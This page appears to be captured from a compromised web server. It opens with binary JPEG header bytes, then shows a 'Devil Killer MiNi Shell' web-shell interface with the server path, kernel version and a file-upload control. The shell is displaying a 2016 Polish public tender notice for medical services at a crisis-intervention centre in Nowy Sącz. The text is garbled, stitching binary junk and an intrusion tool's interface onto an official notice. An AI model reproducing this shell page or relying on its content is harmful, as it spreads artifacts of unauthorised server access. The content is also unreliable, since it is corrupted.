JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161209/363139-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.soik.pl, www.bip.nowysacz.pl' target='_blank'>http://www.soik.pl, www.bip.nowysacz.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 363139 - 2016
              z dnia 2016-12-09 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Nowy Sącz: Świadczenie usług medycznych w Sądeckim Ośrodku Interwencji Kryzysowej w okresie od 01 stycznia do 31 grudnia 2017 roku<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Sądecki Ośrodek Interwencji Kryzysowej, krajowy numer identyfikacyjny
              000971057, ul.
              Śniadeckich 
              10a,
              33-300  
              Nowy Sącz, woj.
              małopolskie, państwo
              Polska, tel.
              184 490 730, e-mail
              administracja@soik.pl, faks
              184 490 731.
              <br />
              Adres strony internetowej (URL): www.soik.pl, www.bip.nowysacz.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.soik.pl, www.bip.nowysacz.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.soik.pl, www.bip.nowysacz.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Pisemnie<br />
                Adres:
                <br />Sądecki Ośrodek Interwencji Kryzysowej, ul. Śniadeckich 10a, 33-300 Nowy Sącz, SEKRETARIAT</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Świadczenie usług medycznych w Sądeckim Ośrodku Interwencji Kryzysowej w okresie od 01 stycznia do 31 grudnia 2017 roku<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b><br />2<br /><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>
Załącznik nr 1 do SIWZ



Przedmiot zamówienia publicznego pn;

Świadczenie usług medycznych w Sądeckim Ośrodku Interwencji Kryzysowej w okresie 
od 01 stycznia do 31 grudnia w 2017 roku 



I. Przedmiotem zamówienia jest świadczenie przez Wykonawcę będącego lekarzem lub felczerem usług medycznych w Sądeckim Ośrodku Interwencji Kryzysowej  w okresie od 01 stycznia 2017 r. do 31 grudnia 2017 r.
1. usług medycznych osobom nietrzeźwym, doprowadzonym do Sądeckiego Ośrodka Interwencji Kryzysowej  Działu Opieki Nad Osobami Nietrzeźwymi w Nowym Sączu zwanym dalej DONON, zgodnie z rozporządzeniem Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),
2.zapewnienie  całodobowej opieki medycznej nad osobami doprowadzonymi do wytrzeźwienia w dziale DONON, 
3.ocena stanu zdrowia osób:
- przyjmowanych do hostelu dla osób znajdujących się w sytuacji ostrego kryzysu związanego z zagrożeniem zdrowia i życia oraz ofiar przemocy - Dział Wsparcia i Interwencji w Sytuacjach Kryzysowych, ul. Śniadeckich 10a, 33-300 Nowy Sącz
- przyjmowanych do noclegowni dla osób bezdomnych - Dział Readaptacji Społecznej, ul. Śniadeckich 10a, 33-300 Nowy Sącz, 
oraz w razie zaistniałej potrzeby zapewnienie  doraźnej pomocy medycznej ww. osobom .

II.  Do obowiązków Wykonawcy będzie należało przede wszystkim: 

1.  Udzielanie świadczeń zdrowotnych osobom doprowadzonym do wytrzeźwienia przez funkcjonariuszy Policji i strażników Straży Miejskiej, w zakresie wynikającym 
z rozporządzenia Ministra Zdrowia z dnia 08 grudnia 2014 r. w sprawie izb wytrzeźwień
i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),
2. Określanie i pisemne potwierdzanie dodatkowych symptomów wskazujących na stan nietrzeźwości, zgodnie z Rozporządzenia Ministra Zdrowia z dnia 8 grudnia 2014 r. 
w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),
3. Stwierdzenie po przeprowadzeniu badania  u osoby doprowadzonej czy:
a) istnieją medyczne przesłanki do umieszczenia osoby doprowadzonej w Dziale Opieki Nad Osobami Nietrzeźwymi  zwanym dalej DONON,  zastosowania pomocy doraźnej, która może być udzielona -w DONON, wykonania zabiegów higieniczno  sanitarnych, uwzględniając objawy stanu nietrzeźwości albo, 
b) istnieją medyczne przesłanki do skierowania do szpitala lub innego publicznego zakładu opieki zdrowotnej  uwzględniając objawy stanu nietrzeźwości osoby doprowadzonej oraz określenia  wskazań do hospitalizacji albo,
c) istnieje brak objawów stanu nietrzeźwości uzasadniających umieszczenie w DONON albo,
d) istnieje brak przeciwwskazań do umieszczenia w DONON.

4. Uwzględnienie przez Wykonawcę, iż nie przyjmuje się do DONON  osób doprowadzonych do wytrzeźwienia jeżeli: 
      a) stan zdrowia osoby doprowadzonej wg opinii Wykonawcy wymaga zastosowania środków, którymi Zamawiający nie dysponuje lub które powinny być zastosowane
w publicznym zakładzie opieki zdrowotnej przez lekarza specjalistę,
      b) brak jest wolnych miejsc w DONON.

5. Dokonanie koniecznych zabiegów medycznych do czasu wytrzeźwienia lub usunięcia skutków zatrucia alkoholem osób doprowadzonych do wytrzeźwienia.

6. Sprawowanie nadzoru medycznego nad osobami nietrzeźwymi do wytrzeźwienia
 i  przeprowadzanie w tym celu obchodu sal.

7. Podejmowanie decyzji o zastosowaniu przymusu bezpośredniego z zachowaniem zasad określonych art. 18 Ustawy z dnia 19 sierpnia 1994 r. o ochronie zdrowia psychicznego  
(t.j. Dz. U. z 2016 poz. 546 ), oraz przeprowadzenie każdorazowo badań po zastosowaniu pasów bezpieczeństwa.

8.  Pobieranie krwi na zawartość alkoholu zgodnie z Rozporządzeniem Ministra Zdrowia 
 z dnia 11 grudnia 2015 r. w sprawie badań na zawartość alkoholu w organizmie (Dz. U. 
 z  2015 poz 2153).

9. Przeprowadzenie z osobami zwalnianymi z DONON rozmów profilaktyczno  wychowawczych o szkodliwości nadużywania napojów alkoholowych.

10. Zastosowanie przez Wykonawcę, przed opuszczeniem przez osobę doprowadzoną do DONON, zabiegów medycznych, niezbędnych ze względu na stan zdrowia osoby doprowadzonej.

11.Prowadzenie przez Wykonawcę pełnej dokumentacji medycznej, zgodnie
 z rozporządzeniem Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień
i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850), oraz  Rozporządzeniem Ministra Zdrowia z dnia 9 listopada 2015 r.
w sprawie rodzajów i zakresu dokumentacji medycznej oraz sposobu jej przetwarzania 
(tj. Dz. U. z 2015 r. poz. 2069 z późn. zm.), a w szczególności:

a) sporządzanie przez Wykonawcę raportów z przebiegu dyżurów z uwzględnieniem liczby przyjętych osób, wydanych leków oraz wszystkich zaistniałych okoliczności podczas trwania dyżuru, 

b) wypełnianie przez Wykonawcę kart pobytu w DONON zgodnie z ustalonym wzorem obowiązek ten dotyczy zapisów stanu z przyjęcia i zwolnienia, oraz stanów i zachowań podczas pobytu, w tym zapisów określonych w rozporządzeniu Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),

12. Zgłaszanie przez Wykonawcę zapotrzebowania na brakujące w ambulatorium leki, środki opatrunkowe zgodnie z wykazem leków oraz sprzętu określonych w rozporządzeniu Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),. 

13. Dokonanie oceny stanu zdrowia osób przyjmowanych  do hostelu dla ofiar przemocy 
 i do noclegowni dla osób bezdomnych   oraz w razie zaistniałej potrzeby zapewnienie  doraźnej pomocy medycznej ww. osobom .

14.  Sporządzanie raportu z przebiegu dyżurów z uwzględnieniem ilości przyjętych i wypisanych pacjentów oraz innych istotnych okoliczności i zdarzeń.

15. Wykonywanie innych niezbędnych czynności  medycznych.

16. Przestrzeganie tajemnicy służbowej i przepisów BHP, ppoż. obowiązujących w siedzibie Zamawiającego wraz z pełną odpowiedzialnością za ich realizację.

III. Niezależnie od wykonywania usług medycznych określonych w pkt II  Wykonawca 
zobowiązany jest w godz. 20.00 do 7.00 podejmować rozmowy telefoniczne z osobami potrzebującymi w danej chwili wsparcia oraz w razie potrzeby umawiać te osoby ze specjalistami, odnotowując ten fakt w książce raportów.
a) Zadanie nr I  obejmuje wykonywanie przedmiotu zamówienia przez 2496 godzin 
w czasie trwania umowy tj. od dnia  01.01.2017 roku do dnia 31.12.2017 roku w każdy piątek od godziny 7.00 do niedzieli  godz. 7:00
b) Zadanie nr II  obejmuje wykonywanie przedmiotu zamówienia przez 1896 godzin 
w czasie trwania umowy tj. od dnia  01.01.2017 roku do dnia 31.12.2017 roku, w każdą niedzielę od 7.00 do poniedziałku do godz. 19:00
c) Zadanie nr III - obejmuje wykonywanie przedmiotu zamówienia przez 1872  godziny 
w czasie trwania umowy tj. od dnia  01.01.2017 roku do dnia 31.12.2017 roku, w każdy poniedziałek  od godz. 19:00 do  środy do godz. 7:00. 
d) Zadanie nr IV - obejmuje wykonywanie przedmiotu zamówienia przez  2496 godzin 
w czasie trwania umowy tj. od dnia  01.01.2017 roku do dnia 31.12.2017 roku, w każdą środę  od godz. 07:00 do piątku do godz. 7:00. 

<br /><br /><b>II.5) Główny kod CPV: </b>85121100-4<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                	w zakresie warunku posiadania kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów:
 Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnieniu warunków. 
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia
o spełnianiu warunku oraz  przedstawia kserokopię polisy ubezpieczenia z tytułu           odpowiedzialności cywilnej w zakresie prowadzonej działalności,  związanej z przedmiotem zamówienia. 
Minimalna gwarancyjna suma ubezpieczenia 75 000,00 euro w odniesieniu do     jednego zdarzenia, oraz 350 000,00 w odniesieniu do wszystkich zdarzeń.
 Dotyczy Zadania nr  I, II III, IV.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunku. 
Zamawiający wymaga przedstawienia kserokopii prawa wykonywania zawodu.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">a) dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego   - dotyczy Zadań I, II, III, IV;

b) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy  dotyczy Zadań I, II, III, IV.

c) kserokopii prawa wykonywania zawodu,

d) Zamawiający żąda od Wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w § 5 pkt. 1-9 rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy w postępowaniu o udzielenie zamówienia (Dz. U. z 2016 r., poz. 1126) (jeżeli dotyczy)
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy  dotyczy Zadań I, II, III, IV.
2. kserokopii prawa wykonywania zawodu
3.  kserokopię polisy ubezpieczenia z tytułu odpowiedzialności cywilnej w zakresie prowadzonej działalności,  związanej z przedmiotem zamówienia. 
Minimalna gwarancyjna suma ubezpieczenia 75 000,00 euro w odniesieniu do     jednego zdarzenia, oraz 350 000,00 w odniesieniu do wszystkich zdarzeń.
 Dotyczy Zadania nr  I, II III, IV.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
